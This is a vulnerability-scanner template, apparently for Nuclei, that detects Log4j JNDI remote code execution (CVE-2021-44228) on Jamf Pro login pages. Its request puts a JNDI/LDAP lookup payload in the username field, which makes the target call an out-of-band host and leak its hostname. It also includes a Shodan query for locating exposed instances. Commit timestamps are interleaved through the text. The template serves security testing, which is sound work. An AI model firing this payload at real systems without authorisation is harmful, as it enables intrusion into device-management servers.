2022-02-01 09:55:52 +00:00
id : jamf-log4j-jndi-rce
info :
2022-10-10 19:51:42 +00:00
name : JamF - Remote Code Execution (Apache Log4j)
2022-02-01 09:55:52 +00:00
author : pdteam
severity : critical
2022-05-31 08:42:11 +00:00
description : |
JamF is susceptible to Lof4j JNDI remote code execution. JamF is the industry standard when it comes to the management of iOS devices (iPhones and iPads), macOS computers (MacBooks, iMacs, etc.), and tvOS devices (Apple TV).
2022-04-22 10:38:41 +00:00
reference :
- https://github.com/random-robbie/jamf-log4j
2022-05-26 16:45:45 +00:00
- https://community.connection.com/what-is-jamf/
2022-07-16 17:08:02 +00:00
- https://logging.apache.org/log4j/2.x/security.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-44228
2022-05-26 16:45:45 +00:00
classification :
2022-10-10 20:06:39 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10
2022-10-10 19:51:42 +00:00
cve-id : CVE-2021-44228
2022-10-19 21:11:27 +00:00
cwe-id : CWE-77
2022-07-18 06:34:40 +00:00
metadata :
shodan-query : http.html:"JamF"
2022-10-10 20:06:39 +00:00
verified : "true"
tags : cve,cve2021,rce,jndi,log4j,jamf,oast,kev
2022-02-01 09:55:52 +00:00
requests :
- raw :
- |
POST / HTTP/1.1
Host : {{Hostname}}
Origin : {{RootURL}}
Referer : {{RootURL}}
Content-Type : application/x-www-form-urlencoded
username=${jndi:ldap://${hostName}.{{interactsh-url}}/test}&password=
matchers-condition : and
matchers :
2022-10-19 21:25:05 +00:00
- type : word
part : body
words :
- '<title>Jamf Pro Login</title>'
2022-02-01 09:55:52 +00:00
- type : word
part : interactsh_protocol # Confirms the DNS Interaction
words :
- "dns"
- type : regex
part : interactsh_request
regex :
2022-02-28 14:09:26 +00:00
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable
2022-02-01 09:55:52 +00:00
extractors :
- type : regex
part : interactsh_request
group : 1
regex :
- '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output
